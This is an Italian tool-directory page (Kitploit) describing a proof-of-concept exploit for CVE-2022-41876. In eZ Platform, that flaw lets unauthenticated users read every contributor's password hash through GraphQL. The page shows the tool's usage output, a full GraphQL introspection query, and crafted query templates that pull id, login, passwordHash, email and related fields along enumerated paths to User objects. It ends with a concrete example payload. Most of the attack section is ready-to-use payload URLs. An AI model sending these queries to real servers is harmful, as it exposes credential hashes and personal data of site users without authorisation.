Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-41876 — PoC per CVE-2022-41876 | Kitploit
Strumenti/GitHubGitHub/skileau/cve-2022-41876
Analisi delle VulnerabilitàExploitRaccolta InformazioniSicurezza WebPenetration Testing
GitHubskileau/cve-2022-41876

CVE-2022-41876

PoC per CVE-2022-41876

Vedi Repository
7113 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
ibexa logo

Python3.9 current version
Twitter Skilo Twitter TahiTi

CVE-2022-41876 - Divulgazione di informazioni utente su eZ Platform

È emersa una vulnerabilità in eZ Platform che permette a un utente non autenticato di accedere all'hash della password di ogni contributore. Questo PoC enumera ogni possibile percorso GraphQL che porta a un oggetto 'User', e poi richiede questi percorsi per recuperare le informazioni riservate degli utenti.

Utilizzo

root@kitploit:~
python3 cve-2022-41876.py -h
root@kitploit:~
usage: cve-2022-41876.py [-h] [-t] [-f FILE] url

CVE-2022-41876 POC

positional arguments:
  url                   URL di destinazione (specifica l'endpoint graphql)

optional arguments:
  -h, --help            mostra questo messaggio di aiuto ed esci
  -t, --thread          Numero di thread
  -f FILE, --file FILE  Percorso locale del file introspect
Scarica lo strumento

Risultati

image

Come funziona?

I diversi passaggi seguiti da questo strumento per sfruttare la CVE sono:

Recupero del file introspect

Il primo passo per sfruttare questa CVE è ottenere un file introspect.json. Un modo per recuperarlo è interrogare l'endpoint graphql del server con il seguente payload:

root@kitploit:~
https://<your-url>/graphql?query={__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name%20description%20locations%20args{...InputValue}}}}fragment%20FullType%20on%20__Type{kind%20name%20description%20fields(includeDeprecated:true){name%20description%20args{...InputValue}type{...TypeRef}isDeprecated%20deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name%20description%20isDeprecated%20deprecationReason}possibleTypes{...TypeRef}}fragment%20InputValue%20on%20__InputValue{name%20description%20type{...TypeRef}defaultValue}fragment%20TypeRef%20on%20__Type{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name}}}}}}}}

Trovare i percorsi verso gli oggetti User

Poi il json fornito dal server può essere utilizzato per estrarre tutti i percorsi verso gli oggetti 'User' con lo strumento graphql-enum-path in questo modo:

image

Richiedere i percorsi trovati per ottenere i dati degli utenti

Infine, una volta trovati tutti i percorsi, un payload specifico deve essere costruito in questo modo e inviato al server:

root@kitploit:~
https://<your-url>/graphql?query={element1{element2{element3{...{id,name,login,passwordHash,email,enabled,maxLogin}}}}}

Dove gli elementi corrispondono ai testi tra parentesi nel risultato di graphql-enum-path (nota che una query deve essere eseguita per ogni percorso).

Quindi, con l'esempio di graphql-enum-path sopra, il primo payload sarebbe:

root@kitploit:~
https://<your-url>/graphql?query={_repository{location{contentInfo{contentType{creator{id,name,login,passwordHash,email,enabled,maxLogin}}}}}}

Se il server è vulnerabile a questa CVE, risponderà a quella query con un file json contenente i dati dei suoi utenti.

Riferimenti

Hacktricks

graphql-enum-path

Crediti

Questo PoC è stato creato da @Skilo e @TahiTi